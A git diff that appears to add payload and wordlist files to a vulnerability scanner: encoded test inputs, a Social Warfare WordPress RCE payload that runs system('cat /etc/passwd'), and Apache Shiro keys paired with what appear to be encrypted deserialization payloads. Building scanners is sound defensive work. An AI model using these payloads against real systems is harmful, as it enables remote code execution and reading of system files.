+QUFBQUFBQUFBQUFBQUFBVEFBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFBVUFBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFBVkFBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFBV0FBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFBWEFBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFBWUFBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFBWkFBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFBW0FBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFBXEFBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFBXUFBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFBXkFBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFBX0FBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFBYEFBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFBYUFBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFBYkFBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFBY0FBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFBZEFBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFBZUFBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFBZkFBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFBZ0FBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFBaEFBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFBaUFBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFBakFBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFBa0FBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFBbEFBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFBbUFBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFBbkFBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFBb0FBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFBcEFBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFBcUFBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFBckFBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFBc0FBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFBdEFBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFBdUFBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFBdkFBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFBd0FBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFBeEFBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFBeUFBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFBekFBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFBe0FBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFBfEFBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFBfUFBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFBfkFBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFBf0FBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFBgEFBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFBgUFBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFBgkFBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFBg0FBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFBhEFBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFBhUFBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFBhkFBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFBh0FBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFBiEFBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFBiUFBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFBikFBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFBi0FBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFBjEFBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFBjUFBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFBjkFBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFBj0FBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFBkEFBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFBkUFBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFBkkFBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFBk0FBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFBlEFBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFBlUFBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFBlkFBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFBl0FBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFBmEFBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFBmUFBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFBmkFBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFBm0FBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFBnEFBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFBnUFBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFBnkFBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFBn0FBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFBoEFBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFBoUFBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFBokFBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFBo0FBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFBpEFBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFBpUFBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFBpkFBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFBp0FBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFBqEFBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFBqUFBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFBqkFBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFBq0FBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFBrEFBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFBrUFBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFBrkFBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFBr0FBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFBsEFBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFBsUFBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFBskFBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFBs0FBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFBtEFBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFBtUFBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFBtkFBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFBt0FBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFBuEFBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFBuUFBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFBukFBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFBu0FBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFBvEFBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFBvUFBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFBvkFBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFBv0FBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFBwEFBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFBwUFBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFBwkFBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFBw0FBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFBxEFBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFBxUFBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFBxkFBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFBx0FBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFByEFBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFByUFBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFBykFBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFBy0FBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFBzEFBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFBzUFBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFBzkFBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFBz0FBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFB0EFBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFB0UFBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFB0kFBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFB00FBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFB1EFBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFB1UFBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFB1kFBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFB10FBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFB2EFBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFB2UFBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFB2kFBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFB20FBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFB3EFBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFB3UFBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFB3kFBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFB30FBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFB4EFBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFB4UFBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFB4kFBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFB40FBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFB5EFBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFB5UFBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFB5kFBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFB50FBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFB6EFBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFB6UFBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFB6kFBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFB60FBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFB7EFBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFB7UFBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFB7kFBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFB70FBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFB8EFBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFB8UFBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFB8kFBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFB80FBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFB9EFBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFB9UFBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFB9kFBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFB90FBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFB+EFBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFB+UFBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFB+kFBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFB+0FBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFB/EFBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFB/UFBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFB/kFBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFB/0FBQUFBQUFBQUFBQUFBQUE= \ No newline at end of file diff --git a/helpers/payloads/wp-social-warfare-rce.txt b/helpers/payloads/wp-social-warfare-rce.txt new file mode 100644 index 0000000000..b0b0564f84 --- /dev/null +++ b/helpers/payloads/wp-social-warfare-rce.txt @@ -0,0 +1 @@ +
system('cat /etc/passwd')
diff --git a/helpers/wordlists/shiro_encrypted_keys.txt b/helpers/wordlists/shiro_encrypted_keys.txt new file mode 100644 index 0000000000..8f7ad77630 --- /dev/null +++ b/helpers/wordlists/shiro_encrypted_keys.txt @@ -0,0 +1,51 @@ +kPH+bIxk5D2deZiIxcaaaA==:f0USSIbi3sbw8Bgn3R/19oDCc/XdB7W17+Fnq0sRSzZYB/WANIHzP6jKXcPkiy3FcZVGY86gSBXj1p9Nlv6b/+X0xf5fvpjtVsM86sZ1KEhjf+iBB2gRYuUoK2a2xGYjSLxYhgVfvPfARwMAT3iEykc67BcfzKSyWa9LlSBE85vv0qdFwIfA/uwCe5r2LF1GFuUSnJjqjNlPTH+yq1xTDo3Ua/mWzCLJ3W5JeJmV0+IV6dfVQ4wq6DHLrptq80JIU5N5YBmdKThNzCFT3Nc7P9gOreQ6VF+GIlAJdt04FhA1m3tDD/vXYTvkF1GQNKbnu9n+daiDNd+DVGyB8+IT8LngRhBbShI3M0hIt75vCU86GXS9L2VLRi2qU2eUmtU2LEZ+iE/yOx99dNettXKi1UZA4x/Nf4018+9pwhJ1QqZP3UhrFgiiPDYh6/ouYviz5Erua12aH4GP2jFJvPwIdEabFpH9WMiSkUKh5M2xtsHPHxZCN7eu5BNQ2US18LooMhVCEZHjZwJFYH229za5cmnKj0kgPcx6bhNsVdDPdtU= +a2VlcE9uR29pbmdBbmRGaQ==:Lymw7k38V0zgxSNE5jvOb8dugluAK6AEV+nTTDHhI3LP4O/HQLqCYwaPlM5URAVjVOqje36G53KsUGmVRLTkdffxq1Skk8x5SU/3RTQtEYvZSpcTFBmFVmnsN2tZnxtRVV6INEnz4NO3Lf6eD/aNO8fepJIAEVn23M0Y8ZxOU6H7jFech7QYQUUS5iI45xJs2OwjW1344YQVh/d4IRN0hAJoU8lx+d7gtTqIawvQ8BJ7Q5mH+l2VMP6HWzsqZhNVd6iyFTwWV2ty7ZSZA2OCClTfvPWi9DZSPOczx/WxjHNWJ7A9UT3QKvdfYM3u9uQE5z4us4aeX7BmmqHcRmJiPVezg/NqwG3sIy5DHGS6Ype12IJn6M9e4PwVsAY4fbScMUtxtIwLbSKFaUaYcx6WkXbD2w7kqFxdIeb8vaomw8UF8Riv0RCnZTBKFwpqQ6vobbaO5y2VZwVfiU4CXfunotEyP4dUVLBCzMfu7W8O/ioDgV5NvdkylnRCWiwsFpsjhHWpWRmknCMiAStWQj2Co+t5GXVvgOr3xQ/gxpYjkAY= +3AvVhmFLUs0KTA3Kprsdag==:kw6Np9KkcpH3/JRL8wpNWB3gssOZa+tpIAiuZEmDPhmSra6Hui73fJhe3gLvo1BqTN16oaxwRbOGidAk5k9aJaqQCBGc9GLrLPI5ShlbZUt22pLjLCH1RUM68/hQTsRdqvRGWIjB1gFYFOHJVF2sCZdJ66qBQDyC/tAuXr8QQLCRjpYbc7U5Ojxmq8UFLVMZUA9jFfIrPvRqaVdak+T81ZpRZ/7KM8Da9TqhDNvQ6p+iDP3mMuk0SW04A3hfxb2n6P9DG7eoRfL4sak/07nW+r0ElA4F9Q69qBfYhlaWkyTviWSuA3S4CKrnkyus6LhkBAmNJ8g4ezoUHQ7rBqurVroWbX4gEBHcvVAafUKWGsU6PR+alySNZ1ocvdK2xy/QndK/OwJdFgwSGvEBj2tRhdyLydOaGFUlilWNU3tmfDm6qPdLO23oLb4yQhW2StqPVvQjBo6Id9Llh5X9JRJRWgu14G5F/0IMnpY5gnqJt5ddF6CSjWpUZkSdBgNtRoZ8IUnWEAtVj6WCuhDtXyy+PN4kp9INJXHvg5ZotswIXSE= +bWljcm9zAAAAAAAAAAAAAA==:O+oNEf+CnPnwusgkAnp5bXUVlhG+MdZeYRGsH26+YDO3kIEbATE/TeYT8hjBEE67ugQ7SFQXn3FKjcHsejZYhd/IV0TzbdVoUu26ZgIJM4wT5EvM3nCW4PtUbzuTNd0rsk9Dr5jrRv8n7Xmcfi0V396quwQWUbDVgBRdwg9/giDNb39VcKV1KD0/JF6ZMJgmduHrL9h25ZUsf2gH4rREwwhNMcWVhSTT4eb+RFioQf8fE6xoFNqQyee53W0Nv3MYROu4+1f+fisgBMq9U7SYWW7UysrLDClEBgObcYWhfxcTcvjcIJZl+UpUI0NL/kbFv4Z7rZ7nwshW8ul/cH1An5qszZrY6zmpUkNTb9FaHboXv+SBrdcdF0dEuOwHA0IT6cZ5kAYqmHRewH4WitRr+SBy9GHdb4IyQD3TLW6daVT/QNys2HliwlBMZLEkoo60EmjA47lnPNI4d/BY5rZEqHpdIBplQwVAEqC69NyLgQ0AfPtuwLkVpMA+f3dJNi5DMYO4lelI6gXEB31REjYQgQV/ixjselOf+VmpJSfcPAQ= +U3ByaW5nQmxhZGUAAAAAAA==:Q3gdz7MW638P5LW/DYZYtnyc8QdezeulZBCkhUS2xu4Ap0QYR7qnrpmcfjcWAjkkTsqpEKlrRYc7i0lfhLFo7m+yFfuZNdPX/7SFpvi0nwW4hVruD+/vLWwjNkV/SmaTjHXdtovYWh7lMxhO8owOyUO2u4ZOjNlCg/jCSmU8ccAnOAtwz3VLdb0pVPQ2CzE9K2uJHcaLN/W1P7eENRsy8xeZx8LKlU1rjM6B/YEtWX6BUce4H2T8+O3MdV1ZPMyj6TAWZ3VKvbuhxXWtUh9lEC9pzV64VnJO27hJ+Ph40xYR+mof+SXleP64dRtfcOYlORpjFP1MWLT4CbH44oiaHUlvJSBho55JZM528Yq1CBs4azHate+V1gOKW0XFimT8CC2mvhXEuJ09vvPJbPPcbYE7jcIQnqbc+ZcalxxrNAWtbnMpYYh/AzyZ4kSdvYJg+dJp6/fy9+TI2cxygLmCcreYSDESuU2i9FGbDCCoD2VtMUx7etmBHyW+3G0Rlzd6Q0dAlHJ45/69rqgMk0Fnyopo45cVE8HAFPXFOzae1Xk= +fCq+/xW488hMTCD+cmJ3aQ==:GtPDQzm/bMq9HmIMjaMAA4R9CTRvWs8jZ90QNmLNrSnaUQXgZaW3nLSatwUyr3YYkGKJTmV4KGjyZzhbVAm9l+Xgid4P3uKBz58TjRuOcASodX/pKCdiRLU6dA+02VVOXtdIhHB7HP+9DlKVsBIOZ3y7h/XW9qFmW1J7nogYN3YzcaR7oOCARvRM/DcFriAUrwaoJrmvtFPf4QtNsktGx8ZFYYd/tn6xWNvZDh35CNJjGER9Ckgy1RUTTjktZoeb/d1SNIxK0IKizgTLPFYjVcBFNqX7o3qMTt6mEIu0zWEocpmvR9RqBsnyD/eYeL+k4ve9vYIO6dPmTIC00N5tqH5oY4Nq9EectMqz/7Orbw4CClnaxtZvE/AOHFc8m0yMfgqzt/E4OJ3IUb/0OljoAZ7BdMg3OHmPXkTV6dkF6nGOqi8Jv261t209ztiZelNlQIFT/K4UKWRHcGkhj/eN2B6pIgPyRSNv/iEf2PVA8iaiPRKkVcUjfHuhIPeCd1r5HyiFIppSgyohlEWcNOXitaPzI7WDXz9EYWDeU1vAJoY= +ZUdsaGJuSmxibVI2ZHc9PQ==:o2B4t6KZhw/v1aEZ2AhCRMCd/45dcXY2WGM9V6pVG6rJzNxPgJcmRmt8o5ZCNua/nZFNNJXncZD6TsugO2e/UZBFPhZrGBLcxw9Pn+SQKgadmeMCk0ERI87jjvidGcLFd00Zoc4OxGcm56lH7hduxd5fwQVOmjciSo0RWJTgOLKJkYJKmYEomp+AkfTjRxqRUwC1xJNfi7EE3b05tERRaWNqz29WWkByyXccDrPTOxLslno332GPXjdTWXdOIvnckNBg02Caw9J70/GjODUE8iPYFQKoYwP5bc/Tz8m2OmttouErkCDODsRYaaUiAAAh9tpSGRDunkyllIEQhYdA4LcrDj+B36kkkBF9kT9ws1LikKGxdxpQqeFJ1qF3uNUjVIww8vkVBl3PIKOwfLwXYL9GIw5uxYKCdDMtXbaFhVexwuuC64VF/S+cCqw+wR3JaQPRXZwzvn+IZs9/GsyxLU4X18aQJ/9gDEouwv/mEGkPyrCB89MH4rFNKy90bHlGcRv6KNcJe6PkDtmDSkk6dRmCeLJz7HYy/MLwB8X3VOM= +MTIzNDU2Nzg5MGFiY2RlZg==:0UQYaokZAOt4Yq1/FrbAG2otUpdxh51vYsLPYfbPbomJbelOlEWuNp9Pt35wEYeVmKDy2DCTORXtXyNocWqQZDQUKKtOzF41yOt9nEy5gcmVHA+PfWv6tpGwKH5ukTo1HKLPA4bEhhGXGTfg5D+pvgtRqa0v1qsgjaRPMyuReQTuvbNGi8LhXnOZygJfL6iXx05PIN91UtW1sqc8nL4toL5UbuPkAXDyiy5WnMMz6y5o0+dRK1SS6HlFhnJmAdewL9cbRlA+bRxt9JHzxYSSbrXwK9yaQNPJ+wf7wqeUINm3k/QWLGEiu7DCzMgRsMTNcWW1FRX343J8Ae5iaEK6OTKppqw4t8u8pTB+DaRhrenCxgtj4yVbauo020YNV3UC1091/eTLrm8FRmM312RdB98iCi14FfwyouKsKr7dCyBOScMkWx+JLXRjxx2lvoSpXctXhgSW2+zu8j/+zMP2frU85kPzysmp5EiQmoOiAmQxkO/ecjGrkM8LM7KpqAIJRyWu6T2s3yc1oCHf7nhcQTiFlh8iLpTYtydhZ9wBFek= +bWluZS1hc3NldC1rZXk6QQ==:djxP3wPzPyifGD4c+42CVYdmslr18s0apUpjRaJzX/LXOi4EHI2DACdwtKufKh+GW8O3oFNrUJm1FamdjqIYdSWklLQQxu8fudoSt5eLEaPnTZ8KFuCCWwUvxZuVrVy6MtaPIgBJEXcA7ckFYk3bLX+M4AGSIjaeKNkqYh4h84F8MHAuH5Ey2dB/t/7z6HipHhjF6sAVW01tqMeGlYKwBozTMGKR0Ne+a8xNnv5BavQCdvzrKas6hxJa4YIMsZv68D1YhytF7stSEHb1Y1W6YM4j83BguRLiWbW5vzz2YZjUFqgLlh0SqDV90LwrLvRe8Gbcv/554zZ19O0ibC0WSQ+b1hr7rss/1rjtalbNe9XkSibn80+VDBz/QLwMVcyx3TJ3n8hB6y2v6lr3yJe/EXlf4R+2Er7/Fzfv2O7YoOd5WaLgYyNaYicBUvNF9NpnQ5BP+0x9Itp9U91MoKNA4pOYgGprCudPxTtcOi9Sb3hYXsWA9JbEq3sHUTVap2XqhrSTQNfoj43g1zrD1WOkZYvL0WBox7X6thJFYmz9tfc= +r0e3c16IdVkouZgk1TKVMg==:LAhazQEF0PMgu9VuwHYK3JET4b/CXHiwaAP6Pc9U6O4HHVWyCUecsw/QBcZBxDsxAM30NkvfGpbFfyldtdEvkaftR+MAjoW11zPhMWeOsjeB+7vLqUlbdkBqK0KmGpRyTbj4xbpRDccG4ZRHika+oFE1mKptChbXm9pvwMn1EI3DpYgu0uuBHPGiwfVQFLoevTIN51L/R8cLI6F5gKS0vbzAw3Y9nCxUbHGY42pVHTYIopdGfDzcCT/h4Z7zWYjggYbh2GmmDekHYRofbPHAWQMWhcZr20Fqc4SN4gyTc2yo1g31ULMF2zkGRMxWct05fYynDM8yRnTwDE4A+o8bNHAQgNTknLkYJfmnLnZg9B97N86eXGuyoTI3HcKhABZt7nPSzgwU8gVemVw2dO6vQQ8YEhIJqMnWnNM9whLHp1GbBiNSMINp3r3RAjXBDpzX68qLxx+aKVKYcql4P9Mdo5MYU42gngj00dhkWb1VLxCWnI+uoxqtUnxlVfJMuQWexjmxRYFybPaxyC1wuhaDziA3ZJKrnCPkQMHX4Co2gOE= +L7RioUULEFhRyxM7a2R/Yg==:swyjNyQ0CRTY6YqDv195fPG47aU0N8dGF6tVyQFqFZGkM8f7HXr9l3xMvMsav/whkKm7jEg7RlVIpGWaD7cLXZZpNqb96hf3OTaenL+79LY133vePyrQ7MMtWzv+q6QQip7RMLQnJUSl6cpGjX//5bpOmgWNuMj/EsEkoR4AzFslWjL+AEbGDzwlUZw/mRA0qxvIXJiQp74IKch94A2fIX2J53N8RJP8DRDXeeo862gF6fOj/mCrY+LcL6bRr2+Jq8aNX1FaTRRi7PeoFyz4DZrtROEA4IVgLOIwAV4ryBG1p03SS+tZp52aAJw9/vXFHbXzTjBqF9H9/4FnIkWlrbicpud9d2Oqj8RStnCsd3R+hfZyvXTDJe8num8l/wPgkVv0LRtw0zH8AzILXkXv9zAnHLQFOwiVo1/1Fpnf9k27aR/okIYknTGn+cQ8/UXjiIPen3MGrvtZJqWSQ6cUTt6WKPruDBvCgHA7VM5C0VA+Qf3g7jGpwtB9DmiI5+YaNyCIG3fMDvu2qZwh8/eHHVMdohGUNU1mTx+IRuqJVus= +wGiHplamyXlVB11UXWol8g==:6I8DCXLx7UtqdUgWsx5ips3S3n+efsAf6NvDjtcd6DcNPnNxA/jJQt91vmeDsd6ZKtawq6tnjrcmkT/f/ETqS4eY2mc/bfbwnRHPkwE3Rm/bVd09mCGmLhffkswk/R82Wlwy1Tw6iMiplt7QmS8U7JXeQbDgWm1I7Bm+EfBnl+ESapgvUmMR1yHdd1ALImTfbb4NbYk3uUICRfn3TRhJxbonXke2f4JbDyYWHtbytonO7+Ua/PoEO5WVP96fQhvTp3nTn2ew5HVDx3iT8X6rUkHDxhkBY17dKxKzPsjoZTfPK/PiJQ6sOT56hoedC7Eu/VnOpk4LAoKIbL2N3QGDYeV8ugH4g6H/YFIeFs/g8+25OymkjCjBiDNdOVQZ687SGxyfU94oUC/ML8f4ggk05j5dvbVAIo6lw5CDFpIh0+zJ6t3WHqKlmnwlQd6UvoeGCq30gwhafuWuGpGx6i/IiINuAq0O7RkwhGPaaswX/q4HdJHT54ZkMZjffottA/L9b/5tWDVbJ67Lk94zMQ9IKOMY6Gmog5JSYtFh/idPaMI= 